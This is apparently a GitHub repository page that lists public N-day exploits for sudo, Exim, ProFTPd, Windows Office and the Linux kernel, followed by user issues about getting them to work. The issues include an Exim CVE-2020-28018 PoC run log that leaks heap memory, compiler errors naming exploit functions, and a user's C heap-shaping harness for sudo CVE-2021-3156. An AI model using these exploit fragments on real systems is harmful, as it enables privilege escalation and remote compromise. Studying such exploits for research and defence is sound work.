
cve-exploits's Introduction

N-day Exploits

  • CVE-2019-18634: Linux sudo LPE exploit for a stack-based buffer overflow in tgetpass.c
  • CVE-2020-28018: Linux Exim RCE exploit for a Use-After-Free in tls-openssl.c
  • CVE-2020-9273: Linux ProFTPd RCE exploit for a Use-After-Free in pool allocator
  • CVE-2021-3156: Linux LPE exploit for a heap-based buffer overflow in sudo
  • CVE-2021-40444: Microsoft Windows RCE exploit for a MS Office bug chain
  • CVE-2022-0185: Linux Kernel LPE exploit for an integer underflow in fs_context.c
  • CVE-2022-2586: Linux Kernel LPE exploit for an nft_object Use-After-Free

Talk slides

Blog posts

Other projects

  • Protcheck: Parse ELF executables to identify enabled memory mitigations

cve-exploits's People

Contributors

lockedbyte avatar


cve-exploits's Issues

Compilation Failures

Working on trying to get this exploit code to compile and I am running into some errors when compiling.

The output of the make can be found here: https://pastebin.com/YLamtKEv

The only change I made was removing malloc.h and replacing it with stdlib.h. Any insights?

not vuln config?

The Exim PoC sends:
[DEBUG] Sending: �2� v
Is my configuration not vulnerable?

Got some error.

Trying your Exim PoC, but I always get this error: Something went wrong initializing encrypted channel ... any advice? :) Thanks.

Older versions of glibc, ubuntu

Hello lockedbyte,
I'm trying to make your PoC work on sudo 1.8.16 with glibc version 2.23, but:
tcache wasn't implemented yet in this glibc version, which made the early heap allocation (setlocale) harder due to the short range 0x20-0x80
of fastbins.

However, I tried setting the LC variables manually, in order, to make the biggest allocation possible, and I reached a fast chunk in nearly all bins: 0x20, 0x30, 0x50, 0x60, 0x80.
Sadly I couldn't get more than one 0x80 free chunk in the fast bins, because if a previous 0x80 chunk was freed, it is freed and malloc'ed again by the next LC variable...

So only one chunk for each size bin. In the end they all got allocated and none of them reached the set_cmnd function.
Do you suggest trying to use small bins and others?
Or keep on trying the fast bins strategy, or what?

As for the fuzzer (your fuzz2), it looks like it won't help for the early allocation (I reached nearly 600000 rounds, although that is a small number). Also, sanity checks are present on all bins but tcache? (I'm not so sure about that.)
I'm getting sanity check memory corruption errors, and even if I fix that:
the sudo_hook_entry struct is way earlier than any allocation the fuzzer makes.

Screenshot below for some debugging:
Ubuntu 16.04, glibc 2.23 / sudo 1.8.16
ASLR disabled
https://prnt.sc/yvmzkf

I would really appreciate it if you could help me. Thanks for your time.

poc don't poc, don't work help plz plz plz.....

Gr33t1ng5.

First of all thanks for hard work. Appreciated.

I'm trying to reproduce your PoC, at least as a study case.
And it would be awesome if you could find a few minutes to give me a hint.

I changed a few lines of code, like the float passed in $rdi to sleep(), and got this:

root@l0c4lh05t:/opt/wokr/PWN/CVE-Exploits/CVE-2020-28018# ./p3w debi.piw 25 127.0.0.1 9999
[i] CVE-2020-28018 Proof-Of-Concept (PoC) exploit by @lockedbyte
[*] Leaking heap addresses...
[+] Connecting to debi.piw:25
220 stand ESMTP Exim 4.92 Sun, 16 May 2021 02:12:40 -0400
[*] Sending EHLO...
[DEBUG] Sending: EHLO host.com

250-stand Hello host.com [192.168.122.1]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-CHUNKING
250-STARTTLS
250-PRDR
250 HELP
[*] Initializing an encrypted TLS channel...
[DEBUG] Sending: STARTTLS

220 TLS go ahead
[+] Initialized encrypted channel with debi.piw:25 (AES256-GCM-SHA384)
[+] Server certificates:
	[i] Subject: /C=AU/ST=AUAUAUAU/L=PIW/O=PEW/OU=meow/CN=FAQN/[email protected]
	[i] Issuer: /C=AU/ST=AUAUAUAU/L=PIW/O=PEW/OU=meow/CN=FAQN/[email protected]
[*] Sending EHLO...
[DEBUG] Sending: EHLO host.com

250-stand Hello host.com [192.168.122.1]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-CHUNKING
250-PRDR
250 HELP
[DEBUG] Sending: MAIL FROM: <>

250 OK
M: <>
[*] Sending pipelined command #1...
[DEBUG] Sending: RCPT TO: postmaster
RCPT TO: postmaster
RCPT TO: postmaster
RCPT TO: postmaster
RCPT TO: postmaster
RCPT TO: postmaster
RCPT TO: postmaster
RCPT TO: postmaster
RCPT TO: postmaster
NO
[*] Closing TLS connection channel...
[*] Sending pipelined command #2...
[DEBUG] Sending: OP

[DEBUG] Sending: RCPT TO: postmaster
RCPT TO: postmaster

250 Accepted
250 Accepted
 postmaster
[*] Sending EHLO...
[DEBUG] Sending: EHLO host.com

250-stand Hello host.com [192.168.122.1]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-CHUNKING
250-STARTTLS
250-PRDR
250 HELP
[*] Re-initializing an encrypted TLS channel...
[DEBUG] Sending: STARTTLS

220 TLS go ahead
[+] Initialized encrypted channel with debi.piw:25 (AES256-GCM-SHA384)
[*] Triggering Use-After-Free...
[DEBUG] Sending: NOOP

250 Accepted
250 Accepted
250 Accepted
250 Accepted
250 Accepted
250 Accepted
250 Accepted
250 Accepted
250 Accepted
250 OK

[+] Memory leak: 

	0x000000: 32 35 30 20 41 63 63 65 70 74 65 64 0d 0a 32 35 250 Accepted..25
	0x000010: 30 20 41 63 63 65 70 74 65 64 0d 0a 32 35 30 20 0 Accepted..250 
	0x000020: 41 63 63 65 70 74 65 64 0d 0a 32 35 30 20 41 63 Accepted..250 Ac
	0x000030: 63 65 70 74 65 64 0d 0a 32 35 30 20 41 63 63 65 cepted..250 Acce
	0x000040: 70 74 65 64 0d 0a 32 35 30 20 41 63 63 65 70 74 pted..250 Accept
	0x000050: 65 64 0d 0a 32 35 30 20 41 63 63 65 70 74 65 64 ed..250 Accepted
	0x000060: 0d 0a 32 35 30 20 41 63 63 65 70 74 65 64 0d 0a ..250 Accepted..
	0x000070: 32 35 30 20 41 63 63 65 70 74 65 64 0d 0a 32 35 250 Accepted..25
	0x000080: 30 20 4f 4b 0d 0a 00 00 00 00 00 00 00 00 00 00 0 OK............
	0x000090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
	0x0000a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
	0x0000b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
	0x0000c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
	0x0000d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
	0x0000e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
	0x0000f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ............... 

Failed to determinate memleak :(
: Success

The last line of the log is the failed check for 0x55 in the response.
I even tried a few hosts from the wild with a hardcoded __asm__("int $3"); after the function... the same thing.

So, the question is:

    i = 0;
    while(i < PIPLN_ITER) {
        strncat(PIPLN_01_CMD, "RCPT TO: [email protected]\n", MAX_PIPLN_SZ-1);
        i++;
    }

Why and how is PIPLN_ITER calculated? Why 0x09? Why do we need them at all in that place?

I don't expect to see any reply, but thank you again.
Good luck.

CVE-2021-3156 crash log process_hooks_getenv() ?

Hello,

I'm trying to write my own exploit.
I tested fuzzy.py... but I can't find an interesting crash...
I found a crash in set_cmnd(), but no crash in nss_load_library() or process_hooks_getenv()...
Maybe set_cmnd() is a good way, but I can't find a way to control R15...

Any ideas?

For info I'm using:
Linux my-box 5.8.0-41-generic #46~20.04.1-Ubuntu SMP Mon Jan 18 17:52:23 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
Sudoers I/O plugin version 1.8.31

Any options to compile sudo 1.8.31? I've used --env-debug with ./configure.

Thanks for your help.

plzplz helphelp (stage 2), now poc in poc

Wait a minute!
What's that?

(screenshot: leak)

Do you see? But why here? I just don't know what to do, how to exploit them.
I think we need to look deeper inside the memory of the exim fork while sending PDUs.

Here is what we receive back from exim after sending the second part of OP:
(screenshot: attackside)

WoW! What a strange chunk... This is a chunk inside a chunk!
(screenshot: victimside)

But what now? Do I need to learn how exim's malloc works? God, noooooo.....

Doesn't compile

Trying to compile it with the following, but it doesn't work:
cc -o exploit exploit.c -Wall -Wextra -Werror -lgnutls

The following errors are thrown:
exploit.c:108:27: error: initialization of ‘long unsigned int’ from ‘void *’ makes integer from pointer without a cast [-Werror=int-conversion]
108 | unsigned long heap_base = NULL; /* we will save here heap base address when leaked */
| ^~~~
exploit.c:109:27: error: initialization of ‘long unsigned int’ from ‘void *’ makes integer from pointer without a cast [-Werror=int-conversion]
109 | unsigned long curr_heap = NULL; /* curr heap for config search */
| ^~~~
exploit.c:110:29: error: initialization of ‘long unsigned int’ from ‘void *’ makes integer from pointer without a cast [-Werror=int-conversion]
110 | unsigned long config_addr = NULL; /* when finding config address, we will save it here */
| ^~~~
exploit.c: In function ‘init_ctx_x’:
exploit.c:156:5: error: ‘TLSv1_2_client_method’ is deprecated [-Werror=deprecated-declarations]
156 | method = TLSv1_2_client_method();
| ^~~~~~
In file included from /usr/include/openssl/e_os2.h:13,
from /usr/include/openssl/ssl.h:15,
from exploit.c:22:
/usr/include/openssl/ssl.h:1891:1: note: declared here
1891 | DEPRECATEDIN_1_1_0(__owur const SSL_METHOD *TLSv1_2_client_method(void))
| ^~~~~~~~~~~~~~~~~~
exploit.c:156:12: error: assignment discards ‘const’ qualifier from pointer target type [-Werror=discarded-qualifiers]
156 | method = TLSv1_2_client_method();
| ^
exploit.c: In function ‘exchange_data’:
exploit.c:285:4: error: implicit declaration of function ‘hexdump’ [-Werror=implicit-function-declaration]
285 | hexdump(buf, size/16);
| ^~~~~~~
exploit.c:287:4: error: implicit declaration of function ‘identify_leak’ [-Werror=implicit-function-declaration]
287 | identify_leak(buf, size);
| ^~~~~~~~~~~~~
exploit.c:294:4: error: implicit declaration of function ‘identify_config’ [-Werror=implicit-function-declaration]
294 | identify_config(mem_exfil, MAX_POST_PIPLN_SZ);
| ^~~~~~~~~~~~~~~
exploit.c: At top level:
exploit.c:305:6: error: conflicting types for ‘hexdump’ [-Werror]
305 | void hexdump(void *mem, unsigned int len) {
| ^~~~~~~
exploit.c:285:4: note: previous implicit declaration of ‘hexdump’ was here
285 | hexdump(buf, size/16);
| ^~~~~~~
exploit.c: In function ‘hexdump’:
exploit.c:318:41: error: implicit declaration of function ‘isprint’ [-Werror=implicit-function-declaration]
318 | else if(isprint(((char *)mem)[j]))
| ^~~~~~~
exploit.c: In function ‘strstrx’:
exploit.c:333:10: error: comparison of integer expressions of different signedness: ‘int’ and ‘size_t’ {aka ‘long unsigned int’} [-Werror=sign-compare]
333 | while(i < sz_1) {
| ^
exploit.c:336:7: error: assignment discards ‘const’ qualifier from pointer target type [-Werror=discarded-qualifiers]
336 | f = str1+i;
| ^
exploit.c: At top level:
exploit.c:368:6: error: conflicting types for ‘identify_config’ [-Werror]
368 | void identify_config(char *buf, size_t size) {
| ^~~~~~~~~~~~~~~
exploit.c:294:4: note: previous implicit declaration of ‘identify_config’ was here
294 | identify_config(mem_exfil, MAX_POST_PIPLN_SZ);
| ^~~~~~~~~~~~~~~
exploit.c: In function ‘identify_config’:
exploit.c:370:24: error: initialization of ‘long unsigned int’ from ‘void *’ makes integer from pointer without a cast [-Werror=int-conversion]
370 | unsigned long r_ptr = NULL;
| ^~~~
exploit.c: At top level:
exploit.c:383:6: error: conflicting types for ‘identify_leak’ [-Werror]
383 | void identify_leak(char *buf, size_t size) {
| ^~~~~~~~~~~~~
exploit.c:287:4: note: previous implicit declaration of ‘identify_leak’ was here
287 | identify_leak(buf, size);
| ^~~~~~~~~~~~~
exploit.c: In function ‘identify_leak’:
exploit.c:391:10: error: comparison of integer expressions of different signedness: ‘int’ and ‘size_t’ {aka ‘long unsigned int’} [-Werror=sign-compare]
391 | while(i < size) {
| ^
exploit.c:399:10: error: comparison of integer expressions of different signedness: ‘int’ and ‘long unsigned int’ [-Werror=sign-compare]
399 | while(x < sizeof(uint64_t)) {
| ^
exploit.c:403:7: error: assignment to ‘uint64_t *’ {aka ‘long unsigned int *’} from incompatible pointer type ‘char (*)[8]’ [-Werror=incompatible-pointer-types]
403 | leak = &lk;
| ^
exploit.c: In function ‘leak_phase’:
exploit.c:451:3: error: ‘return’ with no value, in function returning non-void [-Werror=return-type]
451 | return;
| ^~~~~~
exploit.c:414:5: note: declared here
414 | int leak_phase(char *hostname, int port) {
| ^~~~~~~~~~
exploit.c:463:16: error: passing argument 1 of ‘exchange_data’ makes integer from pointer without a cast [-Werror=int-conversion]
463 | exchange_data(ssl, buf, sizeof(buf)-1, 1, 1, TLS_T);
| ^~~
| |
| SSL * {aka struct ssl_st *}
exploit.c:257:25: note: expected ‘long int’ but argument is of type ‘SSL *’ {aka ‘struct ssl_st *’}
257 | void exchange_data(long fd, char *buf, size_t size, int send_flg, int recv_flg, int method_t) {
| ~~~~~^~
exploit.c:466:16: error: passing argument 1 of ‘exchange_data’ makes integer from pointer without a cast [-Werror=int-conversion]
466 | exchange_data(ssl, buf, sizeof(buf)-1, 1, 1, TLS_T);
| ^~~
| |
| SSL * {aka struct ssl_st *}
exploit.c:257:25: note: expected ‘long int’ but argument is of type ‘SSL *’ {aka ‘struct ssl_st *’}
257 | void exchange_data(long fd, char *buf, size_t size, int send_flg, int recv_flg, int method_t) {
| ~~~~~^~
exploit.c:479:16: error: passing argument 1 of ‘exchange_data’ makes integer from pointer without a cast [-Werror=int-conversion]
479 | exchange_data(ssl, buf, sizeof(buf)-1, 1, 0, TLS_T);
| ^~~
| |
| SSL * {aka struct ssl_st *}
exploit.c:257:25: note: expected ‘long int’ but argument is of type ‘SSL *’ {aka ‘struct ssl_st *’}
257 | void exchange_data(long fd, char *buf, size_t size, int send_flg, int recv_flg, int method_t) {
| ~~~~~^~
exploit.c:515:3: error: ‘return’ with no value, in function returning non-void [-Werror=return-type]
515 | return;
| ^~~~~~
exploit.c:414:5: note: declared here
414 | int leak_phase(char *hostname, int port) {
| ^~~~~~~~~~
exploit.c:528:16: error: passing argument 1 of ‘exchange_data’ makes integer from pointer without a cast [-Werror=int-conversion]
528 | exchange_data(ssl, buf, sizeof(buf)-1, 1, 1, TLS_T);
| ^~~
| |
| SSL * {aka struct ssl_st *}
exploit.c:257:25: note: expected ‘long int’ but argument is of type ‘SSL *’ {aka ‘struct ssl_st *’}
257 | void exchange_data(long fd, char *buf, size_t size, int send_flg, int recv_flg, int method_t) {
| ~~~~~^~
exploit.c:418:13: error: unused variable ‘x’ [-Werror=unused-variable]
418 | int i = 0, x = 0;
| ^
exploit.c:417:6: error: unused variable ‘count’ [-Werror=unused-variable]
417 | int count = 0;
| ^~~~~
exploit.c: In function ‘arbitrary_read’:
exploit.c:564:31: error: initialization of ‘long unsigned int’ from ‘void *’ makes integer from pointer without a cast [-Werror=int-conversion]
564 | unsigned long inject_point = NULL;
| ^~~~
exploit.c:589:3: error: ‘return’ with no value, in function returning non-void [-Werror=return-type]
589 | return;
| ^~~~~~
exploit.c:558:5: note: declared here
558 | int arbitrary_read(char *hostname, int port) {
| ^~~~~~~~~~~~~~
exploit.c:592:16: error: passing argument 1 of ‘exchange_data’ makes integer from pointer without a cast [-Werror=int-conversion]
592 | exchange_data(ssl, buf, sizeof(buf)-1, 1, 1, TLS_T);
| ^~~
| |
| SSL * {aka struct ssl_st *}
exploit.c:257:25: note: expected ‘long int’ but argument is of type ‘SSL *’ {aka ‘struct ssl_st *’}
257 | void exchange_data(long fd, char *buf, size_t size, int send_flg, int recv_flg, int method_t) {
| ~~~~~^~
exploit.c:595:16: error: passing argument 1 of ‘exchange_data’ makes integer from pointer without a cast [-Werror=int-conversion]
595 | exchange_data(ssl, buf, sizeof(buf)-1, 1, 1, TLS_T);
| ^~~
| |
| SSL * {aka struct ssl_st *}
exploit.c:257:25: note: expected ‘long int’ but argument is of type ‘SSL *’ {aka ‘struct ssl_st *’}
257 | void exchange_data(long fd, char *buf, size_t size, int send_flg, int recv_flg, int method_t) {
| ~~~~~^~
exploit.c:600:17: error: passing argument 1 of ‘exchange_data’ makes integer from pointer without a cast [-Werror=int-conversion]
600 | exchange_data(ssl, buf, sizeof(buf)-1, 1, 1, TLS_T);
| ^~~
| |
| SSL * {aka struct ssl_st *}
exploit.c:257:25: note: expected ‘long int’ but argument is of type ‘SSL *’ {aka ‘struct ssl_st *’}
257 | void exchange_data(long fd, char *buf, size_t size, int send_flg, int recv_flg, int method_t) {
| ~~~~~^~
exploit.c:606:16: error: passing argument 1 of ‘exchange_data’ makes integer from pointer without a cast [-Werror=int-conversion]
606 | exchange_data(ssl, buf, sizeof(buf)-1, 1, 0, TLS_T);
| ^~~
| |
| SSL * {aka struct ssl_st *}
exploit.c:257:25: note: expected ‘long int’ but argument is of type ‘SSL *’ {aka ‘struct ssl_st *’}
257 | void exchange_data(long fd, char *buf, size_t size, int send_flg, int recv_flg, int method_t) {
| ~~~~~^~
exploit.c:678:3: error: ‘return’ with no value, in function returning non-void [-Werror=return-type]
678 | return;
| ^~~~~~
exploit.c:558:5: note: declared here
558 | int arbitrary_read(char *hostname, int port) {
| ^~~~~~~~~~~~~~
exploit.c:685:16: error: passing argument 1 of ‘exchange_data’ makes integer from pointer without a cast [-Werror=int-conversion]
685 | exchange_data(ssl, buf, sizeof(buf)-1, 1, 1, TLS_T);
| ^~~
| |
| SSL * {aka struct ssl_st *}
exploit.c:257:25: note: expected ‘long int’ but argument is of type ‘SSL *’ {aka ‘struct ssl_st *’}
257 | void exchange_data(long fd, char *buf, size_t size, int send_flg, int recv_flg, int method_t) {
| ~~~~~^~
exploit.c:564:16: error: unused variable ‘inject_point’ [-Werror=unused-variable]
564 | unsigned long inject_point = NULL;
| ^~~~~~~~~~~~
exploit.c:561:20: error: unused variable ‘l’ [-Werror=unused-variable]
561 | int i = 0, x = 0, l = 0;
| ^
exploit.c:560:17: error: unused variable ‘curr’ [-Werror=unused-variable]
560 | int count = 0, curr = 0;
| ^~~~
exploit.c:560:6: error: unused variable ‘count’ [-Werror=unused-variable]
560 | int count = 0, curr = 0;
| ^~~~~
exploit.c: In function ‘search_config’:
exploit.c:717:10: error: comparison of integer expressions of different signedness: ‘int’ and ‘long unsigned int’ [-Werror=sign-compare]
717 | while(i < (HEAP_RANGE_OFF/READ_SZ)) {
| ^
exploit.c: In function ‘write_what_where’:
exploit.c:748:31: error: initialization of ‘long unsigned int’ from ‘void *’ makes integer from pointer without a cast [-Werror=int-conversion]
748 | unsigned long inject_point = NULL;
| ^~~~
exploit.c:777:3: error: ‘return’ with no value, in function returning non-void [-Werror=return-type]
777 | return;
| ^~~~~~
exploit.c:740:5: note: declared here
740 | int write_what_where(char *hostname, int port, char *injected_config) {
| ^~~~~~~~~~~~~~~~
exploit.c:780:16: error: passing argument 1 of ‘exchange_data’ makes integer from pointer without a cast [-Werror=int-conversion]
780 | exchange_data(ssl, buf, sizeof(buf)-1, 1, 1, TLS_T);
| ^~~
| |
| SSL * {aka struct ssl_st *}
exploit.c:257:25: note: expected ‘long int’ but argument is of type ‘SSL *’ {aka ‘struct ssl_st *’}
257 | void exchange_data(long fd, char *buf, size_t size, int send_flg, int recv_flg, int method_t) {
| ~~~~~^~
exploit.c:783:16: error: passing argument 1 of ‘exchange_data’ makes integer from pointer without a cast [-Werror=int-conversion]
783 | exchange_data(ssl, buf, sizeof(buf)-1, 1, 1, TLS_T);
| ^~~
| |
| SSL * {aka struct ssl_st *}
exploit.c:257:25: note: expected ‘long int’ but argument is of type ‘SSL *’ {aka ‘struct ssl_st *’}
257 | void exchange_data(long fd, char *buf, size_t size, int send_flg, int recv_flg, int method_t) {
| ~~~~~^~
exploit.c:788:17: error: passing argument 1 of ‘exchange_data’ makes integer from pointer without a cast [-Werror=int-conversion]
788 | exchange_data(ssl, buf, sizeof(buf)-1, 1, 1, TLS_T);
| ^~~
| |
| SSL * {aka struct ssl_st *}
exploit.c:257:25: note: expected ‘long int’ but argument is of type ‘SSL *’ {aka ‘struct ssl_st *’}
257 | void exchange_data(long fd, char *buf, size_t size, int send_flg, int recv_flg, int method_t) {
| ~~~~~^~
exploit.c:793:16: error: passing argument 1 of ‘exchange_data’ makes integer from pointer without a cast [-Werror=int-conversion]
793 | exchange_data(ssl, buf, sizeof(buf)-1, 1, 0, TLS_T);
| ^~~
| |
| SSL * {aka struct ssl_st *}
exploit.c:257:25: note: expected ‘long int’ but argument is of type ‘SSL *’ {aka ‘struct ssl_st *’}
257 | void exchange_data(long fd, char *buf, size_t size, int send_flg, int recv_flg, int method_t) {
| ~~~~~^~
exploit.c:866:3: error: ‘return’ with no value, in function returning non-void [-Werror=return-type]
866 | return;
| ^~~~~~
exploit.c:740:5: note: declared here
740 | int write_what_where(char *hostname, int port, char *injected_config) {
| ^~~~~~~~~~~~~~~~
exploit.c:871:16: error: passing argument 1 of ‘exchange_data’ makes integer from pointer without a cast [-Werror=int-conversion]
871 | exchange_data(ssl, buf, sizeof(buf)-1, 1, 0, TLS_T);
| ^~~
| |
| SSL * {aka struct ssl_st *}
exploit.c:257:25: note: expected ‘long int’ but argument is of type ‘SSL *’ {aka ‘struct ssl_st *’}
257 | void exchange_data(long fd, char *buf, size_t size, int send_flg, int recv_flg, int method_t) {
| ~~~~~^~
exploit.c:745:20: error: unused variable ‘l’ [-Werror=unused-variable]
745 | int i = 0, x = 0, l = 0;
| ^
exploit.c:744:6: error: unused variable ‘curr’ [-Werror=unused-variable]
744 | int curr = 0;
| ^~~~
exploit.c:743:6: error: unused variable ‘count’ [-Werror=unused-variable]
743 | int count = 0;
| ^~~~~
exploit.c: In function ‘main’:
exploit.c:905:12: error: unused variable ‘listener_p’ [-Werror=unused-variable]
905 | pthread_t listener_p = 0;
| ^~~~~~~~~~
cc1: all warnings being treated as errors

Work when uid=0, but not uid=1000

Hi,
The PoC script did not work in my Ubuntu 20.04.1 environment, so I tried to make my own PoC script based on the fuzz and exploit method.
For debugging convenience, I did this as the root user. After some work, a PoC worked with the nss_load_library() method.
But when I switched to a general user, the script did not work, because the heap chunk I used to overflow was pre-allocated and stored something like groups=4,24,27,30,46,120,131,132,1000.
I have no idea why this happened; I want to know what the difference is between running this script as the root user and as a normal user. Looking forward to your help. Thanks!

Here is my PoC.

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <ctype.h>

#define SUDOEDIT_PATH "/usr/bin/sudoedit"

int main(int argc, char *argv[]) {
    (void)argc;
    (void)argv;

    /* argv handed to sudoedit: "-s" plus the two long arguments */
    char *s_argv[] = {
        "sudoedit",
        "-s",
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
        "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB\\",
        NULL
    };

    /* environment handed to sudoedit (the LC_* entries shape the heap layout) */
    char *s_envp[] = {
        "B=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB\\",
        "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
        "X/shell", "\\",
        "LC_TELEPHONE=C.UTF-8@Aa3QLwXb3PJLmiDQinnGV9WSiGrxWfRd04R1I2kOLtQyEvuehEJTM7yffnSZwxBdlOaevjyiYbA0wUMP7oPZ",
        "LC_NUMERIC=C.UTF-8@AwuefJrxO4MZdmyVPaVPYnPNVkMkkTZSKDmPTTYlKbE",
        "AgvAS=AKz0",
        NULL
    };

    printf("GOOD LUCK \n");
    printf("%d\n", getuid());
    printf("the pid is: %d\n", getpid());
    for (int i = 0; i < 10; i++) {
        /* wait so a debugger can be attached to this pid */
        printf("%d\n", i);
        sleep(1);
    }
    execve(SUDOEDIT_PATH, s_argv, s_envp);

    /* execve only returns on failure */
    perror("execve");
    return 1;
}

not working on centos 7

malloc(): invalid size (unsorted)
./exp.sh: line 4: 85244 Aborted ./exploit
[i] Try 6940
[.] crafting payload...
[.] triggering heap overflow...
malloc(): invalid size (unsorted)
./exp.sh: line 4: 85245 Aborted ./exploit
[i] Try 6941
[.] crafting payload...
[.] triggering heap overflow...
malloc(): invalid size (unsorted)
./exp.sh: line 4: 85246 Aborted ./exploit
[i] Try 6942
[.] crafting payload...
[.] triggering heap overflow...
malloc(): invalid size (unsorted)
./exp.sh: line 4: 85247 Aborted

This is the output .

Can't get crash about nss_load_library()

Hi, thanks for your work; it helps me a lot. But I ran into a problem.
I run the PoC in nss_crashes/ with sudo env -i gdb < poc, but I didn't get the crash in nss_load_library().
I used the same version of Ubuntu and sudo as yours. The call stack of the crash I got:

#1  0x00007fc71c23b859 in __GI_abort () at abort.c:79
#2  0x00007fc71c2a63ee in __libc_message 
#3  0x00007fc71c2ae47c in malloc_printerr
#4  0x00007fc71c2b1234 in _int_malloc 
#5  0x00007fc71c2b32d4 in __GI___libc_malloc (bytes=262148) at malloc.c:3058
#6  0x00007fc71c4342f9 in sudo_getgrouplist2_v1
#7  0x00007fc71b3e4593 in sudo_make_gidlist_item
#8  0x00007fc71b3e333e in sudo_get_gidlist
#9  0x00007fc71b3dd09d in runas_getgroups () at ./match.c:145
#10 0x00007fc71b3ce872 in runas_setgroups () at ./set_perms.c:1714
#11 set_perms (perm=perm@entry=5) at ./set_perms.c:281
#12 0x00007fc71b3c8d5a in sudoers_lookup
#13 0x00007fc71b3d1b41 in sudoers_policy_main 
#14 0x00007fc71b3cb0fa in sudoers_policy_check 
#15 0x000055e79a3e2c46 in policy_check 
#16 main (argc=<optimized out>, argv=<optimized out>, envp=0x7ffd5fed8a98) at ./sudo.c:253

Is there some other configuration I missed?
